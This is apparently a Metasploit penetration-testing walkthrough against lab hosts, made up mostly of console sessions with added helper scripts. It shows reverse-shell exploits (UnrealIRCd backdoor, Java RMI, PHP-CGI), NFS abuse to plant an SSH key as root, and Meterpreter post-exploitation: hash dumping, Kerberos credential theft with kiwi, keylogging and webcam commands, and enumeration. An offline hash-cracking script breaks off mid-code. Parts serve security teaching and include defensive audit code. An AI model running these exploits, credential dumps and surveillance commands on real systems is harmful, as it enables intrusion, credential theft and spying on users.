[*] 192.168.2.219:1099 - Sending RMI Call...
[*] 192.168.2.219:1099 - Replied to request for payload JAR
[*] Sending stage (58829 bytes) to 192.168.2.219
[*] Meterpreter session 6 opened (192.168.2.200:9999 -> 192.168.2.219:54492 ) at 2022-07-13 22:25:28 -0400
meterpreter > sysinfo
Computer : metasploitable
OS : Linux 2.6.24-16-server (i386)
Architecture : x86
System Language : en_US
Meterpreter : java/linux
meterpreter > cat /proc/version
Linux version 2.6.24-16-server (buildd@palmer) (gcc version 4.2.3 (Ubuntu 4.2.3-2ubuntu7)) #1 SMP Thu Apr 10 13:58:00 UTC 2008
UnrealIRCd backdoor
Configure the unreal_ircd_3281_backdoor module
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 6667 yes The target port (TCP)
Exploit target:
Id Name
-- ----
0 Automatic Target
Set the payload
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
Compatible Payloads
===================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 payload/cmd/unix/bind_perl normal No Unix Command Shell, Bind TCP (via Perl)
1 payload/cmd/unix/bind_perl_ipv6 normal No Unix Command Shell, Bind TCP (via perl) IPv6
2 payload/cmd/unix/bind_ruby normal No Unix Command Shell, Bind TCP (via Ruby)
3 payload/cmd/unix/bind_ruby_ipv6 normal No Unix Command Shell, Bind TCP (via Ruby) IPv6
4 payload/cmd/unix/generic normal No Unix Command, Generic Command Execution
5 payload/cmd/unix/reverse normal No Unix Command Shell, Double Reverse TCP (telnet)
6 payload/cmd/unix/reverse_bash_telnet_ssl normal No Unix Command Shell, Reverse TCP SSL (telnet)
7 payload/cmd/unix/reverse_perl normal No Unix Command Shell, Reverse TCP (via Perl)
8 payload/cmd/unix/reverse_perl_ssl normal No Unix Command Shell, Reverse TCP SSL (via perl)
9 payload/cmd/unix/reverse_ruby normal No Unix Command Shell, Reverse TCP (via Ruby)
10 payload/cmd/unix/reverse_ruby_ssl normal No Unix Command Shell, Reverse TCP SSL (via Ruby)
11 payload/cmd/unix/reverse_ssl_double_telnet normal No Unix Command Shell, Double Reverse TCP SSL (telnet)
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload 5
payload => cmd/unix/reverse
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
Module options (exploit/unix/irc/unreal_ircd_3281_backdoor):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 6667 yes The target port (TCP)
Payload options (cmd/unix/reverse):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.200 yes The listen address (an interface may be specified)
LPORT 8888 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
Trigger the backdoor and get a reverse shell
msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > run
[*] Started reverse TCP double handler on 192.168.2.200:8888
[*] 192.168.2.219:6667 - Connected to 192.168.2.219:6667...
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
[*] 192.168.2.219:6667 - Sending backdoor command...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo St9Ner5x99Zbppzs;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "St9Ner5x99Zbppzs\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 7 opened (192.168.2.200:8888 -> 192.168.2.219:59310 ) at 2022-07-13 22:33:04 -0400
id
uid=0(root) gid=0(root)
uname -a
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux
netstat -antpl |grep 8888
tcp 0 0 192.168.2.219:59310 192.168.2.200:8888 ESTABLISHED 5818/telnet
tcp 0 0 192.168.2.219:59311 192.168.2.200:8888 ESTABLISHED 5822/telnet
NFS misconfiguration
Probe the service
################### Check whether the NFS service is running on the target host ###################
# rpcinfo -p 192.168.2.219
program vers proto port service
100000 2 tcp 111 portmapper
100000 2 udp 111 portmapper
100024 1 udp 37285 status
100024 1 tcp 43521 status
100003 2 udp 2049 nfs
100003 3 udp 2049 nfs
100003 4 udp 2049 nfs
100021 1 udp 45555 nlockmgr
100021 3 udp 45555 nlockmgr
100021 4 udp 45555 nlockmgr
100003 2 tcp 2049 nfs
100003 3 tcp 2049 nfs
100003 4 tcp 2049 nfs
100021 1 tcp 45972 nlockmgr
100021 3 tcp 45972 nlockmgr
100021 4 tcp 45972 nlockmgr
100005 1 udp 54845 mountd
100005 1 tcp 35085 mountd
100005 2 udp 54845 mountd
100005 2 tcp 35085 mountd
100005 3 udp 54845 mountd
100005 3 tcp 35085 mountd
############### List the directories exported by the remote host ###############
# showmount -e 192.168.2.219
Export list for 192.168.2.219:
/ *
Generate an RSA key pair
ssh-keygen
Mount the remote NFS export
######################## Create a local mount point ########################
mkdir /tmp/nfs
#################### Mount the remote NFS export on the local directory ####################
mount -t nfs 192.168.2.219:/ /tmp/nfs
Upload the SSH public key
cat /root/.ssh/id_rsa.pub>>/tmp/nfs/root/.ssh/authorized_keys
Log in via SSH
ssh root@192.168.2.219
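The whole NFS step above rests on one line of showmount output, "/ *": the filesystem root is exported to every host. Writing into /root/.ssh through the mount additionally requires the export to be rw with no_root_squash, which the page does not show and is assumed here about the lab's /etc/exports. As an added example (editor's code, not part of the original page), the following parser reads an /etc/exports and reports the combinations that make this possible; the exports text is constructed, the option names are real nfs-utils export options.

```python
"""Audit /etc/exports for exports that let any client act as root.

Added example (editor's code, not part of the original page). The exports
text is constructed around the page's "showmount -e" result ("/ *"); the
option names are the real nfs-utils export options.
"""
import re

SAMPLE_EXPORTS = """\
# /etc/exports (constructed example)
/            *(rw,sync,no_root_squash,no_subtree_check)
/srv/share   192.168.2.0/24(ro,sync,root_squash)
/home/backup 192.168.2.50(rw,sync)
"""

# "client(opt1,opt2)" or a bare client; an empty client part means every host.
CLIENT_RE = re.compile(r"^(?P<client>[^(]*)(?:\((?P<opts>[^)]*)\))?$")


def parse_exports(text: str) -> list:
    """Return [(path, [(client, {options}), ...]), ...] for non-comment lines."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        parsed = []
        for tok in clients or ["*"]:   # no client list at all: exported to everyone
            m = CLIENT_RE.match(tok)
            if not m:
                raise ValueError(f"unparseable export client: {tok!r}")
            client = m.group("client") or "*"
            opts = set(filter(None, (m.group("opts") or "").split(",")))
            parsed.append((client, opts))
        entries.append((path, parsed))
    return entries


def audit_exports(text: str) -> list:
    """Return (path, client, issue) findings; ro and root_squash are the nfs-utils defaults."""
    findings = []
    for path, clients in parse_exports(text):
        for client, opts in clients:
            if client == "*":
                findings.append((path, client, "exported to every host"))
            if "no_root_squash" in opts:
                findings.append((path, client, "remote root is not squashed: client root writes as uid 0"))
            if path == "/":
                findings.append((path, client, "the whole filesystem is exported"))
            if "rw" in opts and client == "*":
                findings.append((path, client, "writable by every host"))
            if "insecure" in opts:
                findings.append((path, client, "requests from unprivileged source ports are accepted"))
    return findings


if __name__ == "__main__":
    for path, client, issue in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} -> {client}: {issue}")
```

Only the first constructed line produces findings; the two restricted exports pass because root_squash is the default when no_root_squash is absent, which is the single option that turns "writable by every host" into "any client can plant a key for root".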
PHP CGI argument injection
Configure the php_cgi_arg_injection module
msf6 exploit(multi/http/php_cgi_arg_injection) > show options
Module options (exploit/multi/http/php_cgi_arg_injection):
Name Current Setting Required Description
---- --------------- -------- -----------
PLESK false yes Exploit Plesk
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 192.168.2.219 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI no The URI to request (must be a CGI-handled PHP script)
URIENCODING 0 yes Level of URI URIENCODING and padding (0 for minimum)
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.2.200 yes The listen address (an interface may be specified)
LPORT 9999 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
Reverse shell
msf6 exploit(multi/http/php_cgi_arg_injection) > run
[*] Started reverse TCP handler on 192.168.2.200:9999
[*] Sending stage (39860 bytes) to 192.168.2.219
[*] Meterpreter session 8 opened (192.168.2.200:9999 -> 192.168.2.219:58659 ) at 2022-07-13 23:25:52 -0400
meterpreter > shell
Process 5979 created.
Channel 0 created.
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
netstat -antpl | grep 9999
(Not all processes could be identified, non-owned process info
will not be shown, you would have to be root to see it all.)
tcp 0 0 192.168.2.219:58659 192.168.2.200:9999 ESTABLISHED 5977/php
Meterpreter / post-exploitation
Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime. It communicates over the stager socket and provides a comprehensive client-side Ruby API. It features command history, tab completion, channels, and more.
Stealthy
Meterpreter resides entirely in memory and writes nothing to disk.
No new processes are created, because Meterpreter injects itself into the compromised process and can easily migrate to other running processes.
By default, Meterpreter uses encrypted communications.
All of this leaves limited forensic evidence and limited impact on the victim machine.
Powerful
Meterpreter uses a channelized communication system.
The TLV protocol has some limitations.
Extensible
Features can be augmented at runtime and loaded over the network.
New features can be added to Meterpreter without rebuilding it.
Adding runtime features
New features are added to Meterpreter by loading extensions.
The client uploads the DLL over the socket.
The server running on the victim loads the DLL in memory and initializes it.
The new extension registers itself with the server.
The client on the attacker's machine loads the local extension API and can now call the extension's functions.
The whole process is seamless and takes about one second to complete.
Core Commands
=============
Command Description
------- -----------
? Help menu
background Send the current Meterpreter session to the background
bg Same as background
bgkill Kill a background Meterpreter script
bglist List running background Meterpreter scripts
bgrun Run a Meterpreter script in the background
channel Display or control communication channels
close Close a communication channel
disable_unicode_encoding Disables encoding of unicode strings
enable_unicode_encoding Enables encoding of unicode strings
exit Terminate the current Meterpreter session
get_timeouts Show the current session timeout values
guid Get the GUID of the current session
help Help menu
info Show help for a post (post-exploitation) module
irb Open an interactive Ruby shell on the current session
load Load a Meterpreter extension; mimikatz and kiwi are the common ones
machine_id Get the MSF ID of the machine attached to the session
migrate Migrate the session to another process
pivot Set up a pivot, used to reach internal networks
pry Open the Pry debugger on the current session
quit Same as exit
read Read data from a communication channel
resource Run the commands stored in a file
run Run a Meterpreter script or post (post-exploitation) module
sessions Quickly switch to another session
set_timeouts Set the current session timeout values
sleep Force Meterpreter to go quiet, then re-establish the connection
transport Change the current transport mechanism
use Alias for load
uuid Get the UUID of the current session
write Write data to a communication channel
Stdapi: File system Commands
============================
Command Description
------- -----------
cat Read the contents of a file
cd Change the working directory
checksum Retrieve the checksum of a file
cp Copy
dir List files and directories, same as ls
download Download a file or directory
edit Edit a file
getlwd Get the local working directory
getwd Get the working directory
lcd Change the local working directory
lls List local files and directories
lpwd Print the local working directory
ls List files and directories
mkdir Create a directory
rm Delete a file
mv Move (cut)
pwd Print the current working directory
rmdir Delete a directory
search Search for files
show_mount List all mounted drives
upload Upload
Stdapi: Networking Commands
===========================
Command Description
------- -----------
arp Display the host ARP cache
getproxy Display the current proxy configuration
ifconfig Display network interfaces
ipconfig Display network interfaces
netstat Display network connections
portfwd Port forwarding
resolve Resolve a set of host names on the target to IP addresses
route Display or modify the routing table
Stdapi: System Commands
=======================
Command Description
------- -----------
clearev Clear the event log
drop_token Relinquishes any active impersonation token.
execute Execute a command
getenv Get environment variables
getpid Get the current process ID
getprivs Attempt to obtain more privileges
getsid Get the SID of the user running the current process
getuid Get the UID
kill Kill a process
localtime Display the target's local time
pgrep Filter processes by name
pkill Kill processes by name
ps List running processes
reboot Reboot the remote host
reg Modify the remote host's registry
rev2self Calls RevertToSelf() on the remote machine
shell Open a shell on the remote host
shutdown Shut down the remote host
steal_token Attempts to steal an impersonation token from the target process
suspend Suspend or resume a process
sysinfo Get host system information
Stdapi: User interface Commands
===============================
Command Description
------- -----------
enumdesktops List all desktops
getdesktop Get the current meterpreter desktop
idletime Returns the number of seconds the remote user has been idle
keyscan_dump Keylogger: dump captured keystrokes
keyscan_start Keylogger: start capturing
keyscan_stop Keylogger: stop capturing
screenshot Take a screenshot
setdesktop Change the desktop
uictl Control some of the user interface components
Stdapi: Webcam Commands
=======================
Command Description
------- -----------
record_mic Record audio from the default microphone for X seconds
webcam_chat Start a video chat
webcam_list List webcams
webcam_snap Take a snapshot from the specified webcam
webcam_stream Play a video stream from the specified webcam
Stdapi: Audio Output Commands
=============================
Command Description
------- -----------
play play an audio file on target system, nothing written on disk
Priv: Elevate Commands
======================
Command Description
------- -----------
getsystem Attempt to elevate privileges
Priv: Password database Commands
================================
Command Description
------- -----------
hashdump Dump password hashes
Priv: Timestomp Commands
========================
Command Description
------- -----------
timestomp Manipulate file timestamps
meterpreter > sysinfo
Computer : WIN10X64-EDU
OS : Windows 10 (10.0 Build 18363).
Architecture : x64
System Language : zh_CN
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows
meterpreter > guid
[+] Session GUID: 17e90d51-0bd2-4293-bab7-284e094f6f12
meterpreter > getuid
Server username: WIN10X64-EDU\Administrator
meterpreter > arp
ARP cache
=========
IP address MAC address Interface
---------- ----------- ---------
169.254.255.255 ff:ff:ff:ff:ff:ff 15
192.168.2.1 08:3a:38:73:31:f9 14
192.168.2.200 00:0c:29:8a:35:c4 14
192.168.2.255 ff:ff:ff:ff:ff:ff 14
224.0.0.22 00:00:00:00:00:00 1
224.0.0.22 01:00:5e:00:00:16 9
224.0.0.22 01:00:5e:00:00:16 15
224.0.0.22 01:00:5e:00:00:16 14
224.0.0.251 01:00:5e:00:00:fb 15
224.0.0.251 01:00:5e:00:00:fb 14
224.0.0.252 01:00:5e:00:00:fc 15
224.0.0.252 01:00:5e:00:00:fc 14
239.255.255.250 00:00:00:00:00:00 1
239.255.255.250 01:00:5e:7f:ff:fa 9
239.255.255.250 01:00:5e:7f:ff:fa 15
239.255.255.250 01:00:5e:7f:ff:fa 14
255.255.255.255 ff:ff:ff:ff:ff:ff 15
255.255.255.255 ff:ff:ff:ff:ff:ff 14
meterpreter > screenshot
Screenshot saved to: /root/Desktop/mxgikKyO.jpeg
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:9fa36dc4327eacd782cc622a158a301b:::
Loading extensions
kiwi/mimikatz
kiwi commands
Kiwi Commands
=============
Command Description
------- -----------
creds_all Retrieve all credentials (parsed)
creds_kerberos Retrieve Kerberos creds (parsed)
creds_livessp Retrieve Live SSP creds
creds_msv Retrieve LM/NTLM creds (parsed)
creds_ssp Retrieve SSP creds
creds_tspkg Retrieve TsPkg creds (parsed)
creds_wdigest Retrieve WDigest creds (parsed)
dcsync Retrieve user account information via DCSync (unparsed)
dcsync_ntlm Retrieve user account NTLM hash, SID and RID via DCSync
golden_ticket_create Create a golden kerberos ticket
kerberos_ticket_list List all kerberos tickets (unparsed)
kerberos_ticket_purge Purge any in-use kerberos tickets
kerberos_ticket_use Use a kerberos ticket
kiwi_cmd Execute an arbitary mimikatz command (unparsed)
lsa_dump_sam Dump LSA SAM (unparsed)
lsa_dump_secrets Dump LSA secrets (unparsed)
password_change Change the password/hash of a user
wifi_list List wifi profiles/creds for the current user
wifi_list_shared List shared wifi profiles/creds (requires SYSTEM)
Retrieve Windows credentials
meterpreter > load kiwi
meterpreter > creds_kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================
Username Domain Password
-------- ------ --------
(null) (null) (null)
Administrator WIN7X64-PRO (null)
win7x64-pro$ sam.zoqa.com <u%cRB#Tg6B7e>^m&;CDRz'=w\;s7>u+:+b3ecQhKR>e9JHkL*aJQrA<-X7zJ8fW/6%l i5G!Lq8kSB.OLN*b87DrLfqHmFaEn4U;LX`@)`vqYs/Lr/Ldi7#
win7x64-pro$ SAM.ZOQA.COM <u%cRB#Tg6B7e>^m&;CDRz'=w\;s7>u+:+b3ecQhKR>e9JHkL*aJQrA<-X7zJ8fW/6%l i5G!Lq8kSB.OLN*b87DrLfqHmFaEn4U;LX`@)`vqYs/Lr/Ldi7#
Post-exploitation with post modules
After the reverse shell comes back, use the background command to send the session to the background, then use other post modules for post-exploitation.
Return to the session with sessions <id>.
Check whether the target is a virtual machine: post/windows/gather/checkvm
A reverse shell must already have come back and established a session.
msf6 post(windows/gather/checkvm) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7X64-PRO 192.168.2.200:4444 -> 192.168.2.242:49163 (192.168.2.242)
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/windows/gather/checkvm
msf6 post(windows/gather/checkvm) > show options
Module options (post/windows/gather/checkvm):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
msf6 post(windows/gather/checkvm) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows NT AUTHORITY\SYSTEM @ WIN7X64-PRO 192.168.2.200:4444 -> 192.168.2.242:49163 (192.168.2.242)
msf6 post(windows/gather/checkvm) > set session 1
session => 1
msf6 post(windows/gather/checkvm) > run
[*] Checking if the target is a Virtual Machine ...
[+] This is a VMware Virtual Machine
[*] Post module execution completed
Enumerate installed applications: post/windows/gather/enum_applications
msf6 post(windows/gather/enum_applications) > show options
Module options (post/windows/gather/enum_applications):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION yes The session to run this module on
msf6 post(windows/gather/enum_applications) > setg session 1
session => 1
msf6 post(windows/gather/enum_applications) > run
[*] Enumerating applications installed on WIN7X64-PRO
Installed Applications
======================
Name Version
---- -------
7-Zip 22.00 (x64) 22.00
Google Chrome 103.0.5060.114
Microsoft .NET Framework 4 Client Profile 4.0.30319
Microsoft .NET Framework 4 Client Profile 4.0.30319
Microsoft .NET Framework 4 Extended 4.0.30319
Microsoft .NET Framework 4 Extended 4.0.30319
Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.28.29913 14.28.29913.0
Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.28.29913 14.28.29913.0
Microsoft Visual C++ 2019 X64 Additional Runtime - 14.28.29913 14.28.29913
Microsoft Visual C++ 2019 X64 Minimum Runtime - 14.28.29913 14.28.29913
Microsoft Visual C++ 2019 X86 Additional Runtime - 14.28.29913 14.28.29913
Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.28.29913 14.28.29913
[+] Results stored in: /root/.msf4/loot/20220714033151_default_192.168.2.242_host.application_581375.txt
Enumerate logged-on users: post/windows/gather/enum_logged_on_users
msf6 post(windows/gather/enum_logged_on_users) > show options
Module options (post/windows/gather/enum_logged_on_users):
Name Current Setting Required Description
---- --------------- -------- -----------
CURRENT true yes Enumerate currently logged on users
RECENT true yes Enumerate Recently logged on users
SESSION 1 yes The session to run this module on
msf6 post(windows/gather/enum_logged_on_users) > run
[*] Running against session 1
Current Logged Users
====================
SID User
--- ----
S-1-5-18 NT AUTHORITY\SYSTEM
S-1-5-21-1012354990-2264756431-1354823717-500 WIN7X64-PRO\Administrator
[+] Results saved in: /root/.msf4/loot/20220714033540_default_192.168.2.242_host.users.activ_416725.txt
Recently Logged Users
=====================
SID Profile Path
--- ------------
S-1-5-18 %systemroot%\system32\config\systemprofile
S-1-5-19 C:\Windows\ServiceProfiles\LocalService
S-1-5-20 C:\Windows\ServiceProfiles\NetworkService
S-1-5-21-1012354990-2264756431-1354823717-500 C:\Users\Administrator
S-1-5-21-3545534923-732207918-319454455-1110 C:\Users\win7
S-1-5-21-3545534923-732207918-319454455-500 C:\Users\administrator.SAM
[*] Post module execution completed
Enumerate installed patches: post/windows/gather/enum_patches
msf6 post(windows/gather/enum_patches) > show options
Module options (post/windows/gather/enum_patches):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
msf6 post(windows/gather/enum_patches) > run
[*] Patch list saved to /root/.msf4/loot/20220714034241_default_192.168.2.242_enum_patches_980994.txt
[+] KB2534111 installed on 7/8/2022
[+] KB2999226 installed on 7/8/2022
[+] KB958488 installed on 7/8/2022
[+] KB976902 installed on 11/21/2010
[*] Post module execution completed
PowerShell environment (post/windows/gather/enum_powershell_env)
Reports the PowerShell version, execution policy, snap-ins, modules and whether any user has a profile script. Version 2.0 on this Windows 7 host means none of the script block logging or AMSI integration of PowerShell 5 and later is present, which matters both for what you can run and for what gets logged.
msf6 post(windows/gather/enum_powershell_env) > show options
Module options (post/windows/gather/enum_powershell_env):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION 1 yes The session to run this module on
msf6 post(windows/gather/enum_powershell_env) > run
[*] Running module against WIN7X64-PRO
[*] Powershell is Installed on this system.
[*] Version: 2.0
[*] Execution Policy:
[*] Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
[*] No PowerShell Snap-Ins are installed
[*] Powershell Modules:
[*] AppLocker
[*] BitsTransfer
[*] PSDiagnostics
[*] TroubleshootingPack
[*] Checking if users have Powershell profiles
[*] Checking Administrator
[*] Post module execution completed
Enumerating services (post/windows/gather/enum_services)
CRED and PATH filter on the account a service runs as and on its binary path; TYPE filters on the startup type. The table below is what you mine for services that start automatically as LocalSystem from a writable or unquoted path.
msf6 post(windows/gather/enum_services) > show options
Module options (post/windows/gather/enum_services):
Name Current Setting Required Description
---- --------------- -------- -----------
CRED no String to search credentials for
PATH no String to search path for
SESSION 1 yes The session to run this module on
TYPE All yes Service startup Option (Accepted: All, Auto, Manual, Disabled)
msf6 post(windows/gather/enum_services) > run
[*] Listing Service Info for matching services, please wait...
[+] New service credential detected: AeLookupSvc is running as 'localSystem'
[+] New service credential detected: ALG is running as 'NT AUTHORITY\LocalService'
[+] New service credential detected: aspnet_state is running as 'NT AUTHORITY\NetworkService'
Services
========
Name                  Credentials                 Startup  Command
----                  -----------                 -------  -------
ALG                   NT AUTHORITY\LocalService   Manual   C:\Windows\System32\alg.exe
AeLookupSvc           localSystem                 Manual   C:\Windows\system32\svchost.exe -k netsvcs
AppIDSvc              NT Authority\LocalService   Manual   C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
AppMgmt               LocalSystem                 Manual   C:\Windows\system32\svchost.exe -k netsvcs
Appinfo               LocalSystem                 Manual   C:\Windows\system32\svchost.exe -k netsvcs
AudioEndpointBuilder  LocalSystem                 Auto     C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
AudioSrv              NT AUTHORITY\LocalService   Auto     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
AxInstSV              LocalSystem                 Manual   C:\Windows\system32\svchost.exe -k AxInstSVGroup
BDESVC                localSystem                 Manual   C:\Windows\System32\svchost.exe -k netsvcs
BFE                   NT AUTHORITY\LocalService   Auto     C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
BITS                  LocalSystem                 Auto     C:\Windows\System32\svchost.exe -k netsvcs
...
wscsvc                NT AUTHORITY\LocalService   Auto     C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
wuauserv              LocalSystem                 Auto     C:\Windows\system32\svchost.exe -k netsvcs
wudfsvc               LocalSystem                 Manual   C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted
(The module prints the header as Name/Credentials/Command/Startup, but the values come out in the order Name/Credentials/Startup/Command; the header above is relabelled to match the data.)
[+] Loot file stored in: /root/.msf4/loot/20220714034555_default_192.168.2.242_windows.services_733410.txt
[*] Post module execution completed
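The services table is only useful once you turn it into findings. The script below is an added example and not code from the page or from Metasploit: it parses rows in the order they are printed above (name, account, startup type, command), re-joined onto one line each, and flags unquoted paths containing spaces, binaries outside C:\Windows, and services running as a named account. The rows for ALG, BITS and wuauserv are copied from the output above; VulnUpdater and BackupAgent are invented to exercise the checks, and the heuristics (first ".exe" ends an unquoted path, anything outside C:\Windows is third-party) are simplifications, not Metasploit's logic.

```ruby
# Added example (not from the original page): parse the Services table that
# post/windows/gather/enum_services writes to loot and flag the classic
# misconfigurations worth a second look: unquoted paths with spaces, binaries
# outside %SystemRoot%, and services running under a named (non built-in) account.

Service = Struct.new(:name, :credentials, :startup, :command)

BUILTIN_ACCOUNTS = [
  'localsystem', 'nt authority\system',
  'nt authority\localservice', 'nt authority\networkservice'
].freeze

# Each data row is: Name  Credentials  Startup  Command. Credentials may contain a
# space (NT AUTHORITY\LocalService), so the startup keyword anchors the split.
# Header, separator and "..." lines simply do not match and are dropped.
def parse_services(text)
  text.each_line.filter_map do |line|
    m = line.strip.match(/\A(\S+)\s+(.+?)\s+(Auto|Manual|Disabled)\s+(.+)\z/)
    m && Service.new(m[1], m[2], m[3], m[4])
  end
end

# Heuristic: for an unquoted command the executable is everything up to and
# including the first ".exe"; for a quoted command it is the quoted string.
def service_binary(command)
  if command.start_with?('"')
    command[/\A"([^"]+)"/, 1] || command
  else
    command[/\A(.*?\.exe)/i, 1] || command.split.first
  end
end

def findings(svc)
  out = []
  exe = service_binary(svc.command)
  out << :unquoted_path if !svc.command.start_with?('"') && exe.include?(' ')
  out << :outside_systemroot unless exe.downcase.start_with?('c:\windows\\')
  out << :named_account unless BUILTIN_ACCOUNTS.include?(svc.credentials.downcase)
  # Auto-start, LocalSystem and a third-party binary: the path's ACLs decide who gets SYSTEM.
  out << :autostart_as_system if svc.startup == 'Auto' &&
                                 svc.credentials.casecmp?('localsystem') &&
                                 out.include?(:outside_systemroot)
  out
end

# Returns {name => [findings]} for every service with at least one finding.
def triage(text)
  parse_services(text).to_h { |s| [s.name, findings(s)] }.reject { |_, f| f.empty? }
end

# Constructed sample: three rows copied from the enum_services output above plus
# two invented services (VulnUpdater and BackupAgent) to exercise the checks.
SAMPLE_SERVICES = <<~'TABLE'
  Name          Credentials                Startup  Command
  ----          -----------                -------  -------
  ALG           NT AUTHORITY\LocalService  Manual   C:\Windows\System32\alg.exe
  BITS          LocalSystem                Auto     C:\Windows\System32\svchost.exe -k netsvcs
  wuauserv      LocalSystem                Auto     C:\Windows\system32\svchost.exe -k netsvcs
  VulnUpdater   LocalSystem                Auto     C:\Program Files\Vuln App\updater.exe /service
  BackupAgent   CORP\svc_backup            Auto     "C:\Program Files\Backup\agent.exe" /run
TABLE

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_SERVICES).each { |name, f| puts "#{name}: #{f.join(', ')}" }
end
```

Feed it the loot file path instead of SAMPLE_SERVICES to run it on a real dump; a :named_account hit means the service's password sits in the LSA secrets, which is a separate extraction step rather than a hash to crack.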
Dumping password hashes (post/windows/gather/smart_hashdump)
Output lines are in pwdump/JtR format, user:RID:LM:NT:::. aad3b435b51404eeaad3b435b51404ee is the LM field for an empty or disabled LM hash (the default since Vista), and 31d6cfe0d16ae931b73c59d7e0c089c0 is the NT hash of an empty string, so the Administrator account on this host has a blank password. With a database connected the hashes also show up under creds.
msf6 post(windows/gather/smart_hashdump) > show options
Module options (post/windows/gather/smart_hashdump):
Name Current Setting Required Description
---- --------------- -------- -----------
GETSYSTEM true no Attempt to get SYSTEM privilege on the target host.
SESSION 1 yes The session to run this module on
msf6 post(windows/gather/smart_hashdump) > run
[*] Running module against WIN7X64-PRO
[*] Hashes will be saved to the database if one is connected.
[+] Hashes will be saved in loot in JtR password file format to:
[*] /root/.msf4/loot/20220714034935_default_192.168.2.242_windows.hashes_728157.txt
[*] Dumping password hashes...
[*] Trying to get SYSTEM privilege
[+] Got SYSTEM privilege
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 17616e5575ff1a73c1cd668d5964850a...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...
[*] No users with password hints on this system
[*] Dumping password hashes...
[+] Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[+] admin1:1005:aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4:::
[*] Post module execution completed
Cracked offline: 579da618cfbfa85247acf1f800a280a4 -> admin@123 (the admin1 account)
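What you do with the dump is crack it offline. The script below is an added example, not code from the page or from Metasploit: it parses the pwdump lines, recognises the empty-password NT hash, and runs a wordlist against the rest. NT hashes are unsalted MD4 over the UTF-16LE password, so hashing the wordlist once and looking every account up in that table is enough. MD4 is implemented inline because OpenSSL 3 keeps it in the legacy provider, where OpenSSL::Digest::MD4 is frequently unavailable. The Administrator and admin1 lines are copied from the output above; the svc_backup line (NT hash of "password") and the five-word wordlist are constructed, and whether admin1 is recovered depends on the page's admin@123 note being correct.

```ruby
# Added example (not from the original page): triage a smart_hashdump loot file
# (pwdump/JtR format, user:RID:LM:NT:::) and run a small offline wordlist attack
# on the NT hashes. MD4 is implemented inline (RFC 1320) because OpenSSL 3 ships
# MD4 only in its legacy provider, so OpenSSL::Digest::MD4 is often unavailable.

module MD4
  MASK = 0xffffffff
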